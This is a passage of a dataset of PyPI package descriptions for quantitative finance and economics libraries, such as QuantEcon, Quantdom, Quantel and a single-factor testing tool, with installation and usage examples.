QuantCrypt usesTyperinternally to provide the CLI experience.\nYou can use the--helpoption to learn more about each command and subcommand.qclib--help\nqclib--info\nqclib--version\n\nqclibkeygen--help\nqclibencrypt--help\nqclibdecrypt--help\nqclibsign--help\nqclibverify--help\nqcliboptimize--helpSecurity StatementThe PQC algorithms used in this library inherit their security from thePQCleanproject.\nYou can read the security statement of the PQClean project from theirSECURITY.mdfile.\nTo report a security vulnerability for a PQC algorithm, please create anissuein the PQClean repository.CreditsThis library would be impossible without these essential dependencies:PQClean- C source code of Post-Quantum Cryptography algorithmsCryptodome- AES-256 and SHA3 implementationArgon2-CFFI- Argon2 KDF implementationI thank the creators and maintainers of these libraries for their hard work."} +{"package": "quantdata", "pacakge-description": "No description available on PyPI."} +{"package": "quant-data-sdk", "pacakge-description": "QuantData sdkauth tokenfor access write to support@quantdata.sciencesimple usage:get companies:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_companies()\n\n\nget quotations:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_quotations_as_df(\"KGHM\", date_from=\"2015-01-01\", date_to=\"2021-01-01\", stock=\"GPW\")\n\nget reports:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_reports(\"KGHM\")"} +{"package": "quantdom", "pacakge-description": "Quantdom is a simple but powerful backtesting framework written in python, that strives to let you focus on modeling financial strategies, portfolio management, and analyzing backtests. It has been created as a useful and flexible tool to save the systematic trading community from re-inventing the wheel and let them evaluate their trading ideas easier with minimal effort. It\u2019s designed for people who are already comfortable withPythonand who want to create, test and explore their own trading strategies.Quantdom is in an early alpha state at the moment. So please be patient with possible errors and report them.FeaturesFree, open-source and cross-platform backtesting frameworkMultiple data feeds: csv files and online sources such as Google Finance, Yahoo Finance, Quandl and moreInvestment Analysis (performance and risk analysis of financial portfolio)Charting and reporting that help visualize backtest resultsRequirementsPython3.6or higherPyQt5PyQtGraphNumPySeepyproject.tomlfor full details.InstallationUsing the binariesYou can download binary packages for your system (see theGithub Releasespage for available downloads):ForWindowsForMacOSForLinuxRunning from source codeYou can install laststable releasefrom pypi:$pipinstallquantdomAnd latestdevelopment versioncan be installed directly from GitHub:$pipinstall-Ugit+https://github.com/constverum/Quantdom.gitAfter that, to run the application just execute one command:$quantdomUsageRun Quantdom.Choose a market instrument (symbol) for backtesting on theDatatab.Specify a file with your strategies on theQuotestab, and select one of them.Run a backtest. 
Once this is done, you can analyze the results and optimize parameters of the strategy. Strategy Examples: Three-bar strategy: A simple trading strategy based on the assumption that after three consecutive bullish bars (bar closing occurred higher than its opening) bulls predominate in the market and therefore the price will continue to grow; after 3 consecutive bearish bars (the bar closes lower than its opening), the price will continue to go down, since bears predominate in the market.\n\nfrom quantdom import AbstractStrategy, Order, Portfolio\n\nclass ThreeBarStrategy(AbstractStrategy):\n\n    def init(self, high_bars=3, low_bars=3):\n        Portfolio.initial_balance = 100000  # default value\n        self.seq_low_bars = 0\n        self.seq_high_bars = 0\n        self.signal = None\n        self.last_position = None\n        self.volume = 100  # shares\n        self.high_bars = high_bars\n        self.low_bars = low_bars\n\n    def handle(self, quote):\n        if self.signal:\n            props = {\n                'symbol': self.symbol,  # current selected symbol\n                'otype': self.signal,\n                'price': quote.open,\n                'volume': self.volume,\n                'time': quote.time,\n            }\n            if not self.last_position:\n                self.last_position = Order.open(**props)\n            elif self.last_position.type != self.signal:\n                Order.close(self.last_position, price=quote.open, time=quote.time)\n                self.last_position = Order.open(**props)\n            self.signal = False\n            self.seq_high_bars = self.seq_low_bars = 0\n\n        if quote.close > quote.open:\n            self.seq_high_bars += 1\n            self.seq_low_bars = 0\n        else:\n            self.seq_high_bars = 0\n            self.seq_low_bars += 1\n\n        if self.seq_high_bars == self.high_bars:\n            self.signal = Order.BUY\n        elif self.seq_low_bars == self.low_bars:\n            self.signal = Order.SELL\n\nDocumentation: In progress ;) TODO:\n- Add integration with TA-Lib\n- Add the ability to use TensorFlow/CatBoost/Scikit-Learn and other ML tools to create incredible algorithms and strategies. Just as one of the first tasks is Elliott Wave Theory (Principle) - to recognize the current wave and on the basis of this predict price movement at confidence intervals\n- Add the ability to make a sentiment analysis from different sources (news, tweets, etc)\n- Add ability to create custom screens, ranking functions, reports\nContributing:\n- Fork it: https://github.com/constverum/Quantdom/fork\n- Create your feature branch: git checkout -b my-new-feature\n- Commit your changes: git commit -am \u2018Add some feature\u2019\n- Push to the branch: git push origin my-new-feature\n- Submit a pull request!\nDisclaimer: This software should not be used as a financial advisor, it is for educational use only.\nAbsolutely no warranty is implied with this product. By using this software you release the author(s) from any liability regarding the use of this software. You can lose money because this program probably has some errors in it, so use it at your own risk. And please don\u2019t take risks with money you can\u2019t afford to lose. Feedback: I\u2019m very interested in your experience with Quantdom.\nPlease feel free to send me any feedback, ideas, enhancement requests or anything else. License: Licensed under the Apache License, Version 2.0"} +{"package": "quantdsl", "pacakge-description": "Quant DSL is a functional programming language for modelling derivative instruments. At the heart of Quant DSL is a set of built-in elements (e.g. \u201cMarket\u201d, \u201cChoice\u201d, \u201cWait\u201d) that encapsulate maths used in finance and trading (i.e. models of market dynamics, the least-squares Monte Carlo approach, time value of money calculations) and which can be composed into executable expressions of value. User defined functions are supported, and can be used to generate massive expressions. The syntax of Quant DSL expressions has been formally defined, and the semantic model is supported with mathematical proofs.
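To make the paragraph above concrete, the fragment below sketches roughly what a Quant DSL value expression built from those elements might look like, held in an ordinary Python string. Only the element names Market, Choice and Wait come from the description above; the date literal, the market name and the overall surface syntax are illustrative assumptions, not the package's documented grammar.

```python
# Illustrative only: a Quant DSL-style expression composed from the built-in
# elements named above (Market, Choice, Wait). The exact syntax accepted by
# the quantdsl package may differ from this sketch.
dsl_source = """
Wait('2025-01-01',
    Choice(
        Market('GAS') - 9,   # exercise: pay a strike of 9 against the market price
        0                    # or let the option lapse
    )
)
"""

print(dsl_source)
```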
The Python package quantdsl is an implementation in Python of the Quant DSL syntax and semantics.An extensiveREADME file is available on GitHub."} +{"package": "quanteam-si", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanteasy", "pacakge-description": "quanteasy"} +{"package": "quantecon", "pacakge-description": "QuantEcon.pyA high performance, open source Python code library for economicsfromquantecon.markovimportDiscreteDPaiyagari_ddp=DiscreteDP(R,Q,beta)results=aiyagari_ddp.solve(method='policy_iteration')InstallationBefore installingquanteconwe recommend you install theAnacondaPython distribution, which includes a full suite of scientific python tools.Note:quanteconis now only supporting Python version 3.5+. This is mainly to allow code to be written taking full advantage of new features such as using the@symbol for matrix multiplication. Therefore please install the latest Python 3 Anaconda distribution.Next you can install quantecon by opening a terminal prompt and typingpip install quanteconUsageOncequanteconhas been installed you should be able to import it as follows:importquanteconasqeYou can check the version by runningprint(qe.__version__)If your version is below what\u2019s available onPyPIthen it is time to upgrade. This can be done by runningpip install --upgrade quanteconExamples and Sample CodeMany examples of QuantEcon.py in action can be found atQuantitative Economics. See also theDocumentationNotebook galleryQuantEcon.py is supported financially by theAlfred P. Sloan Foundationand is part of theQuantEcon organization.Downloading thequanteconRepositoryAn alternative is to download the sourcecode of thequanteconpackage and install it manually fromthe github repository. For example, if you have git installed typegit clone https://github.com/QuantEcon/QuantEcon.pyOnce you have downloaded the source files then the package can be installed by runningpip install flit\nflit install(To learn the basics about setting up Git seethis link.)"} +{"package": "quantecon_book_networks", "pacakge-description": "quantecon-book-networksPython Package forhttps://networks.quantecon.org(Economic Networks)Releases2023-Dec-06: v1.1DEPS: Add POTS as a dependency to support the lectures and enable automatic installation of dependencies2023-Nov-20: v1.0This is the firstv1release to support the publication of the bookPackage BuilderThis package usesflitto build and publish updates to PyPITo update the package:Make the necessary updates tomain(via PR or push)Useflit installto install it for local testingTo publish useflit publish:warning: You will need to have mantainer priviledges\non PyPI forquantecon_book_networkspackage.The configuration forflitis found inpyproject.toml"} +{"package": "quantecon-book-theme", "pacakge-description": "quantecon-book-themeA Jupyter Book Theme for QuantEcon Book Style ProjectsUsageTo use this theme inJupyter Book:Install the themepip install git+https://github.com/QuantEcon/quantecon-book-theme.gitAdd the theme to your_config.ymlfile:sphinx:config:html_theme:quantecon_book_themeUpdating Fixtures for TestsUpdating test regression files on layout changesIt is advisable to update the test files for file regression checks when releavant layout files change.For example, at present we have a sidebar file-regression check to validate html across tests.\nThe file which it compares against istests/test_build/test_build_book.html.If updating the sidebar html, then one of the easier steps to update this test file is:Delete the 
filetests/test_build/test_build_book.html.Runpytestin your command line, which will then generate a new file. Check if the file is at par with your expectations, contains elements which you added/modified.Now future pytests will test against this file, and the subsequent tests should pass.Contributing GuideThe docs for the contributing guide of this repository:https://github.com/QuantEcon/quantecon-book-theme/blob/master/docs/contributing/index.md"} +{"package": "quanteda", "pacakge-description": "quantedaPerform exploratory data analysis (EDA) on quantitative financial data.Function DescriptionThis package aims to be the starting point for any analysis of quantitative financial data by supplying functions that create charts and metrics to simplify exploratory data analysis and give the user a jump-start on their project. This package simplifies the creation of charts that look at the distribution of numeric features and missing information in the data set; two critical steps in any financial analysis. The package also includes a function that will generate a random time series. Financial variables like stock prices and interest rates vary over time, so this ability to generate a time series quickly is extremely useful. Finally, this package also includes a function that will automatically calculate several useful financial metrics so that more time can be spent on more complicated analysis.The functions in this package include:plot_missing_vals: Plot tick chart to display missing values for all numeric features in the dataset.plot_num_dist: Creates a chart of histograms for all numeric features in a data set.generate_return_series: Generates a DataFrame with independent time series of returns.generate_financial_metrics: Calculates financial metrics based on a DataFrame of random returns on time series. These metrics aretotal return,annual return,annual volatilitiesandsharpe ratioContributorsDoris (Yun Yi) CaiJake BarnabeJohn ShiuMerete LutzInstallationFor UserTo install the package, run the following command from the terminalpipinstallquantedaFor DevelopersClone this repository.gitclonegit@github.com:UBC-MDS/quanteda.gitcdquanteda/Note: If you are using HTTP, simply change to HTTP and copy the clone link before following the same procedure above.Install the virtual environment.condaenvcreate-fenvironment.ymlActivate the installed environment:condaactivatequantedaInstall the package.poetryinstallUsageUsing this packageTo use this package, import and call the functions in Python. 
Below is an example:fromquanteda.plot_missing_valsimportplot_missing_valsfromquanteda.plot_num_distimportplot_num_distfromquanteda.generate_financial_metricsimportgenerate_financial_metricsfromquanteda.generate_return_seriesimportgenerate_return_seriesCall functionplot_missing_valsto visualize the presence of missing values.Call functionplot_num_distto plot the distribution of the return series.Call functiongenerate_financial_metricsto calculate the financial metrics of the return series.Call functiongenerate_return_seriesto simulate time series return given an expected return, volatility and return distribution of a stock.Run unit testsExecute the following in the project root directory to run the unit tests of the package,poetryrunpytestor, to run with the code covergage reporting,poetryrunpytest--cov=quantedapoetryrunpytest--cov=quanteda--cov-branchpoetryrunpytest--cov=quanteda--cov-branch--cov-reportterm-missingDocumentationThe official documentation is hosted on Read the Docs:https://quanteda.readthedocs.io/en/latest/quanteda in the Python EcosystemOur package fills a gap in the python ecosystem by being marketed specifically to financial data. Python users commonly create EDA charts using popular packages likematplotlib,altair, andseaborn, and conduct their financial analysis using packages likepandas,numpy, andscipy. These libraries are extensive, but have been generalized to be as useful as possible to as many differen fields as possible. It takes time to learn the syntax and code of these packages that work for financial data. This can be time consuming during EDA, when the goal is to quickly get a rough idea of what the data set you are using looks like. Our package will simplify these actions into a few functions that will save time on tedious EDA so that more time can be spent on analysis and testing.ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licensequantedawas created by Doris (Yun Yi) Cai, Jake Barnabe, John Shiu, Merete Lutz. It is licensed under the terms of the MIT license.Creditsquantedawas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "quantel", "pacakge-description": "Official Python Library for the Quantel Finance APIWebsite:quantel.ioDocumentation:quantel.io/docs/pythonBlog Posts:The Most Powerful Python Finance Library You\u00e2\u20ac\u2122ve Never Heard OfSource Code:ratherbland/QuantelGet API Key:links.quantel.io/getstartedTable of ContentsOverviewSupport For Major Exchanges.SetupRequirementsInstallationExamplesBasic ExampleMultiple Symbol ExampleInternational ExampleAsynchronous ExampleLicenseContactOverviewQuantel is a powerful financial data and insights API. It provides easy access to world-class financial information. Quantel goes beyond just financial statements, giving users valuable information like insider transactions, major shareholder transactions, share ownership, peers, and so much more.Some features of Quantel:Fast: Data is retrieved through API endpoints instead of web scraping. 
Additionally, asynchronous requests can be utilized with simple configurationSimple: Data for multiple symbols can be retrieved with simple one-linersLightweight: Minimal reliance on third party packagesPowerful: 40+ years of historical financial data for almost 25k thousand companies across the globeSupport For Major Exchanges.AmericasNASDAQNew York Stock Exchange (NYSE)Toronto Stock Exchange (TSX)Asia PacificAustralian Stock Exchange (ASX)Hong Kong Stock Exchange (HKEX)National Indian Stock Exchange (NSE)EuropeGerman Electronic Exchange (XETRA)EuroNext (ENX)London Stock Exchange (LSE)Moscow Stock Exchange (MOEX)Oslo Stock Exchange (OSE)Swiss Stock Exchange (SIX)SetupRequirementsPython 3.6+Requests- The elegant and simple HTTP library for Python, built for human beings.Aiohttp- Asynchronous HTTP Client/Server for asyncio and Python.InstallationpipinstallquantelExamplesBasic ExamplefromquantelimportQuantel# Authenticate with the APIqt=Quantel(api_key=\"\")# Instantiate the ticker classgoog=qt.ticker('goog')# Retrieve company profilegoog.profile()Multiple Symbol ExampleThetickerclass also makes it easy to retrieve data for a list of symbols with the same API. Simply pass a list of symbols as the argument to thetickerclass.fromquantelimportQuantelqt=Quantel(api_key=\"\")symbols=['fb','aapl','amzn','nflx','goog']faang=qt.ticker(symbols)faang.profile()International ExampleQuantel supports the majority of international exchanges. Read more about what data is supported by which exchanges atquantel.io/docs/fromquantelimportQuantelqt=Quantel(api_key=\"\")symbols=['DHER.DE','CBA.AX','DNB.OL','NESN.SW','ULVR.L','SHOP.TO','EDF.PA',' RELIANCE.NS']international=qt.ticker(symbols)international.balance_sheet()Asynchronous ExampleIt really is that simple. Setasynchronous=Truewhen instantiating the ticker class.fromquantelimportQuantelqt=Quantel(api_key=\"\")goog=qt.ticker('goog',asynchronous=True)goog.profile()LicenseThis project is licensed under the terms of the MIT license.ContactQuestions can be raised directly viaguy@quantel.io"} +{"package": "quanter", "pacakge-description": "No description available on PyPI."} +{"package": "quantestpy", "pacakge-description": "QuantestPyQuantestPy is an unit testing framework for quantum computing programs.InstallationWe encourage installing QuantestPy via the pip tool(a python package manager).\nThe following command installs the core QuantestPy component.pipinstallquantestpyTesting approaches with QuantestPyYou insert assert methods in your source codes.# your_source_code.pyimportquantestpyasqpstate_vec=[0.7072+0j,0,0,0.7072+0j]# check that the state vector is normalized.qp.assert_normalized_state_vector(state_vector_subject_to_test=state_vec)...QuantestPy provides several assert methods to check for and report failures. 
The following table lists the available methods:\n\nMethod | Checks that\nassert_normalized_state_vector(state_vec) | state_vec is normalized\nassert_equivalent_state_vectors(state_vec_a, state_vec_b) | state_vec_a == state_vec_b\nassert_unitary_operator(operator) | operator is unitary\nassert_equivalent_operators(operator_a, operator_b) | operator_a == operator_b\nassert_circuit_equivalent_to_operator(circuit, operator) | circuit == operator\nassert_qubit_reset_to_zero_state(circuit, qubits) | qubits in circuit are 0 states\nassert_ancilla_reset(circuit, ancilla_qubits) | ancilla_qubits in circuit are always 0 states\nassert_equivalent_circuits(circuit_a, circuit_b) | circuit_a == circuit_b\nassert_unary_iteration(circuit, input_to_output) | circuit is the expected indexed operation\nassert_circuit_equivalent_to_output_qubit_state(circuit, input_to_output) | circuit's output for the input is as expected\n\nThe hyperlinks bring you to details of the methods. License: Apache License 2.0"} +{"package": "quant-experiment", "pacakge-description": "Features:\n- Realtime stock and option data: You can easily extract the latest stock and option information\n- Option characteristics: Library provides you with option relevant characteristics based on Black-Scholes model\nInstallation: Installing with pip:\n\n$ pip install quant_experiment\n\nQuickstart: Data is retrieved from Alpha Vantage API free services, make sure initializing a key variable first:\n\nkey = \"YOUR_API_KEY\"\n\nOperation on stock data:\n\nfrom quant_experiment import finproducts\nstock_demo = finproducts.Stock('AAPL', key)\nstock_demo.price             # return realtime stock price\nstock_demo.latestTradingDay  # latest trading day\nstock_demo.volume            # volume\n\nOperation on option data:\n\nfrom quant_experiment import finproducts\noption_demo = finproducts.VanillaOption('AAPL', 21, 6, 2019, 180, 'calls')  # call option with expiration date 2019-06-21 and strike price 180\noption_demo.option_info()\n\nGiving us output as: Return option property based on Black-Scholes:\n\nfrom quant_experiment import finproducts\noption_demo = finproducts.VanillaOption('AAPL', 21, 6, 2019, 180, 'calls')\noption_demo.BS_Info(key)            # return implied volatility by default\noption_demo.BS_Info(key, 'greeks')  # return delta, gamma, vega, theta and rho\n\nContributing: All contributions are welcome."} +{"package": "quantfactortest", "pacakge-description": "# Please install directly with pip install quantfactortest. The install pulls in one extra package, baostock, which is used to fetch index returns (daily frequency only); its purpose is to compute excess returns (explained in detail below). This single-factor test comes in a minute-level version (1-minute, 5-minute, 10-minute and so on) and a daily-level version (one bar per day).\nFirst, the parameters of the daily-level version are explained. ## Daily level:\nWhen calling it, first pass in the required parameters: use far = analyze_daily_factor(factor, price, quantiles=5, periods=[1], neutralize=0, demeaned=False, show_IC_line=True, show_IC_heat=True, show_test_line=True, show_test_heat=True).\nfactor, price: factor and price are n*m DataFrames. Keep the index of both in datetime format (or as time strings, which the program converts to datetime automatically), and keep the columns of the two aligned: for example, if 000001.sh is the first column of factor, make it the first column of price as well. factor carries each instrument's factor value on each day; price carries each instrument's value on each day, and that value is yours to choose: it can be the open, the close, an average price and so on. Why pass price rather than returns directly? So that returns can be computed over different holding periods; see the explanation of periods.\nquantiles: default 5, the number of groups used in the grouped backtest.\nperiods: default [1], meaning the return is computed over 1 day, i.e. next day's value / today's value - 1. If it is [1,2,3,5,10], the program produces the full set of results for each of these holding periods in turn. One important concept needs to be spelled out here: in the grouped backtest, suppose the chosen holding period is 2; if an instrument is worth 10 yuan on Monday and 11 yuan on Wednesday, the price rise is 10%, but the backtest return is actually 10%/2 = 5%. Why? Because half of the capital also has to go to the stocks selected on Tuesday, and the capital used on Wednesday is the other half from Monday (assuming by then it has already been recovered).\nneutralize: default 0, which simply means no neutralization, i.e. the index's excess return is not subtracted. The index data come from baostock, see: http://baostock.com/baostock/index.php/%E6%8C%87%E6%95%B0%E6%95%B0%E6%8D%AE. To subtract a specific index, set neutralize to that index's code, e.g. neutralize='sh.000001'. Composite indices, e.g.: sh.000001 SSE Composite Index, sz.399106 SZSE Composite Index, etc.; size indices, e.g.: sh.000016 SSE 50, sh.000300 CSI 300, sh.000905 CSI 500, sz.399001 SZSE Component Index, etc.; level-1 industry indices, e.g.: sh.000037 SSE Medicine, sz.399433 CNI Transportation, etc.; level-2 industry indices, e.g.: sh.000952 CSI 300 Real Estate, sz.399951 CSI 300 Banks, etc.; strategy indices, e.g.: sh.000050 SSE 50 Equal Weight, sh.000982 CSI 500 Equal Weight, etc.; growth indices, e.g.: sz.399376 Small-Cap Growth, etc.; value indices, e.g.: sh.000029 SSE 180 Value, etc.; theme indices, e.g.: sh.000015 SSE Dividend Index, sh.000063 SSE Cyclical Industry, etc.; fund indices, e.g.: sh.000011 SSE Fund Index, etc.; bond indices, e.g.: sh.000012 SSE Government Bond Index, etc.\ndemeaned: default False; whether to subtract, on each day, the average return of all stocks (a simple average, not weighted by market cap). For example, if three stocks return 1%, 2% and 3% on Monday and demeaned=True, the final results become -1%, 0% and 1%.\nshow_IC_line, show_IC_heat, show_test_line, show_test_heat: all default to True.\nshow_IC_line: whether to draw the IC line chart; with very large data sets (especially minute-level data) plotting is slow, so skipping the line chart saves time.\nshow_IC_heat: whether to show the monthly IC chart.\nshow_test_line: whether to draw the line charts of the grouped backtest results.\nshow_test_heat: whether to show the monthly heat maps of the grouped backtest results; they produce a lot of images, so turning them off keeps the screen clean.\nSet to True to show a chart, False to hide it. ## Next, the results are explained: please use far.get_all(percentiles=[0.2,0.4,0.6,0.8], buy=[5], sell=[1], gap=10). There are four extra parameters here; how to use them is explained below together with the results they affect. First, a DataFrame describing the factor is printed, covering the factor in every quantile; the percentiles argument is there to show the size of the factor at specific positions in more detail. Next come the IC (and RankIC) values, the line chart of how IC (and RankIC) evolve, and the monthly IC values, which help judge whether the factor has decayed recently and how stable it is from month to month; gap is the window of the rolling-average line drawn on these charts, default 10 (two weeks). Then the grouped backtest: line charts of the compounded returns of each group and of the cumulative returns of each group, and the monthly compounded (and cumulative) return charts of a given group, whose purpose is to judge time rotation (seasonal rotation) and the like. Then the part tied to buy and sell: buy=[5] and sell=[1] mean going long the fifth quantile and short the first quantile, with capital allocated equally; the default is to go long the largest quantile and short the smallest one. Then come the line chart of that strategy's compounded return and the turnover of each quantile in each period, which help judge how hard the strategy is to implement and how large the various fees would be. Finally, the factor's autocorrelation coefficients, which assist in judging the fourth point.
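Putting the daily-level parameters and the reporting call together, a minimal end-to-end sketch might look like the following. The import path and the toy factor/price DataFrames are assumptions made for illustration (the description above does not show the package's import layout); the analyze_daily_factor and get_all calls use exactly the arguments documented above.

```python
import numpy as np
import pandas as pd

# Assumed import path; adjust to however quantfactortest actually exposes the function.
from quantfactortest import analyze_daily_factor

# Toy inputs: an n x m factor DataFrame and a price DataFrame with identical
# datetime index and identical column order, as required above.
dates = pd.date_range("2021-01-04", periods=250, freq="B")
codes = ["000001.sh", "600000.sh", "000002.sz"]
rng = np.random.default_rng(0)
factor = pd.DataFrame(rng.normal(size=(len(dates), len(codes))), index=dates, columns=codes)
price = pd.DataFrame(
    100 * np.exp(np.cumsum(rng.normal(0.0, 0.01, size=(len(dates), len(codes))), axis=0)),
    index=dates, columns=codes,
)

# Daily-level single-factor test with the default arguments described above.
far = analyze_daily_factor(
    factor, price,
    quantiles=5, periods=[1], neutralize=0, demeaned=False,
    show_IC_line=True, show_IC_heat=True, show_test_line=True, show_test_heat=True,
)

# Full report: factor description, IC/RankIC charts, grouped backtest,
# long-short results (long quantile 5, short quantile 1) and turnover.
far.get_all(percentiles=[0.2, 0.4, 0.6, 0.8], buy=[5], sell=[1], gap=10)
```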
\u4ee5\u4e0a\u5c31\u662f\u65e5\u7ea7\u522b\u7684\u56de\u6d4b\uff0c\u5206\u949f\u7ea7\u522b\u7684\u56de\u6d4b\u4ec5\u6709\u7a0d\u5fae\u7684\u53d8\u52a8\uff0c\u6211\u5c06\u53ea\u9610\u8ff0\u4e0d\u4e00\u6837\u7684\u53d8\u5316\u3002\nfar=analyze_minute_factor(factor,price,minute,quantiles=5,periods=[240],demeaned=False,trade_day=[],trade_time=[],show_IC_line=True,show_IC_heat=True,show_test_line=True,)minute\uff0c\u8bf7\u8f93\u5165\u60a8\u7684\u65f6\u95f4\u95f4\u9694\u3002\u5047\u5982\u662f5\u5206\u949f\uff0c\u90a3\u4e48\u8bf7\u8f93\u51655\u3002periods\uff0c\u9ed8\u8ba4\u503c\u4e3a240\u3002\u5047\u8bbe\u60a8\u7684\u65f6\u95f4\u95f4\u9694\u4e3a5\uff0c\u90a3\u4e48\u5efa\u8bae\u4e0d\u8981\u5c06\u4ea4\u6613\u5468\u671f\u4f4e\u4e8e240/5=48\uff0c\u56e0\u4e3a240\u5206\u949f=4\u5c0f\u65f6\u662fA\u80a1\u65e5\u5185\u7684\u4ea4\u6613\u65f6\u95f4\uff0cA\u80a1\u65e5\u5185\u4e0d\u5141\u8bb8\u4e70\u5356\uff0c\u6240\u4ee5\u8bf7\u5c06periods\u8bbe\u7f6e\u7684\u95f4\u9694\u5927\u4e8e240/minute\u56e0\u4e3abaostock\u6ca1\u6709\u5206\u949f\u7ea7\u522b\u7684\u6307\u6570\u6570\u636e\uff0c\u6240\u4ee5\u6211\u5728\u6b64\u5220\u6389\u4e86neutralize\u3002trade_day\u548ctrade_time\u662f\u7528\u6765\u8ba1\u7b97\u6536\u76ca\u7387\u7684\u3002\u6211\u8981\u8be6\u7ec6\u5730\u8868\u660e\u5b83\u548cperiods\u7684\u533a\u522b\u3002\u5982\u679c\u6211\u7684minute\u662f5\uff0cperiods\u4e3a48\uff0c\u90a3\u4e48\u6211\u5728\u5468\u4e00\u76849:35\u7684\u80a1\u7968\u5c06\u4f1a\u5728\u5468\u4e8c\u76849:35\u518d\u6b21\u4ea4\u6613\uff0c\u5468\u4e00\u76849\uff1a40\u7684\u80a1\u7968\u5c06\u4f1a\u5728\u5468\u4e8c\u76849\uff1a40\u518d\u6b21\u4ea4\u6613\u2026\u2026\u5982\u679ctrade_day\u4e3a[1],trade_time\u4e3a[\u201815:00\u2019]\uff0c\u8fd9\u610f\u5473\u7740\u6211\u7edf\u4e00\u5728\u6b21\u65e5\u768415\uff1a00\u8fdb\u884c\u4ea4\u6613\u3002\u4e5f\u5c31\u662f\u4e0d\u7ba1\u6211\u662f\u5728\u5468\u4e00\u76849:35\u4e70\u7684\u8fd8\u662f10\uff1a00\u4e70\u7684\uff0c\u6211\u90fd\u4f1a\u7edf\u4e00\u5728\u5468\u4e8c\u768415\uff1a00\u8fdb\u884c\u4ea4\u6613\u6765\u8ba1\u7b97\u6536\u76ca\u7387\u3002\u5728\u6700\u7ec8\u7684\u7ed3\u679c\u4e2d\uff0c\u5c06\u4e0d\u4f1a\u518d\u4ea7\u751f\u6708\u5ea6\u6536\u76ca\u7387\u56fe\u6807\uff0c\u6240\u4ee5\u6ca1\u6709show_test_heat\u8fd9\u4e2a\u53c2\u6570\u3002"} +{"package": "quantfeed", "pacakge-description": "QuantBox Datacenter Python API."} +{"package": "quantfinpy", "pacakge-description": "No description available on PyPI."} +{"package": "quantfintech", "pacakge-description": "No description available on PyPI."} +{"package": "quantflow", "pacakge-description": "Quantitative analysis and pricing tools.Documentation is available asquantflow jupyter book.InstallationpipinstallquantflowModulesquantflow.datadata APIs (requiresquantflow[data])quantflow.optionsoption pricing and calibrationquantflow.spstochastic process primitives"} +{"package": "quantfns", "pacakge-description": "This module has been created to provide functions that are useful in pricing and risk management of fixed-income securities. The goal is to break-down complex quantitative financial calculations into easy-to-understand functions as much as possible.To begin with, there are two functions:duration: calculates the Macaulay and Modified Durations.\nbondprice: provides an estimated price for a security for a given basis point change.More functions will be added periodically."} +{"package": "quantfolio", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content."} +{"package": "quant-framework", "pacakge-description": "No description available on PyPI."} +{"package": "quantfreedom", "pacakge-description": "No description available on PyPI."} +{"package": "quant-friend", "pacakge-description": "Quant Friend\u80cc\u666f\u548c\u76ee\u7684\u5728\u91cf\u5316\u56de\u6d4b\u73af\u5883\uff0c\u7ecf\u5e38\u9700\u8981\u8d2d\u7f6e\u548c\u8bd5\u7528\u4e00\u4e9b\u4e34\u65f6\u7684\u8ba1\u7b97\u8d44\u6e90\u3002\u8fd9\u4e2a\u9879\u76ee\u7684\u76ee\u7684\u662f\u7b80\u5316\u5728\u8fd9\u8fc7\u7a0b\u4e2d\u7684\u91cd\u590d\u64cd\u4f5c\u3002\u4e00\u952e\u8d2d\u7f6e\u6a21\u5757TBC\u6c47\u62a5\u6a21\u5757\u8fd9\u4e2a\u6a21\u5757\u9700\u8981\u88ab\u56de\u6d4b\u5e94\u7528\u5f15\u5165\uff0c\u5728\u76f8\u5173\u8ba1\u7b97\u7ed3\u675f\u540e\uff0c\u8bb2\u7ed3\u679c\u6c47\u62a5\u7ed9\u7279\u5b9a\u5173\u6ce8\u8005\uff0c\u540c\u65f6\u901a\u77e5\u8ba1\u7b97\u8d44\u6e90\u4f9b\u5e94\u5546\uff0c\u8981\u6c42\u505c\u6b62\u670d\u52a1\u3002email\u53ef\u4ee5\u663e\u5f0f\u8c03\u7528fromquant_friendimportconfig_email_senderconfig_email_sender('sender@my.com','smtp.my.com',465,True,'sender','password')\u8fdb\u884c\u90ae\u7bb1\u6ce8\u518c\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u81ea\u52a8\u6ce8\u518c\u3002smtp_sendersmtp_hostsmtp_portsmtp_sslsmtp_usersmtp_password\u5220\u9664\u4e3b\u673a\u53ef\u4ee5\u663e\u5f0f\u8c03\u7528fromquant_friendimportregister_ucloudregister_ucloud(region=\"\",private_key=\"\",public_key=\"\",)\u8fdb\u884c\u6ce8\u518c\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u81ea\u52a8\u6ce8\u518c\u3002\u4efb\u610fuc-\u5f00\u5934\u7684\u73af\u5883\u53d8\u91cf\u90fd\u4f1a\u88ab\u81ea\u52a8\u8bfb\u53d6\u3002fromquant_friendimportlist_and_delete_host# \u5220\u9664\u6240\u6709\u4e3b\u673alist_and_delete_host('ucloud')# \u6309\u4e1a\u52a1\u7ec4\u5220\u9664\u4e3b\u673alist_and_delete_host('ucloud',Tag=\"\u4f60\u7684\u4e1a\u52a1\u7ec4\")"} +{"package": "quantgen", "pacakge-description": "UNKNOWN"} +{"package": "quantglobal", "pacakge-description": "Quantitative Global - v1 APIThis package allows access to data provided byQuantitative Global Indices.InstallationUse the package managerpipto install quantglobal.pipinstallquantglobalUsageimportQuantGlobalasqgdata=qg.download(key,strategy,underlying,from_date,**end_date)Valid parameterskeythe email address associated with your account (e.g., 'your_address@ email.com')strategy'dca' (Dual Class Arbitrage)'pt' (Pairs Trading)'pt_extended' (Pairs Trading w/ Extended Data)underlyingFor Dual Class Arbitrage ('dca'), the valid underlying parameters are:'google','zillow','fox','news'For Pairs Trading (both 'pt' and 'pt_extended'), the valid underlying parameters are:'communications','consumer_discretionary','consumer_staples','energy','financials','healthcare','industrials','basic_materials','technology','utilities'from_date / end_date (optional)date in YYYY-mm-dd formatSample RequestimportQuantGlobalasqgdata=qg.download(key='authenticated_user@email.com',strategy='dca',underlying='google',from_date='2022-11-25')Output:datetimeGOOG Cumulative ReturnsGOOGL Cumulative ReturnsSpreadGOOG 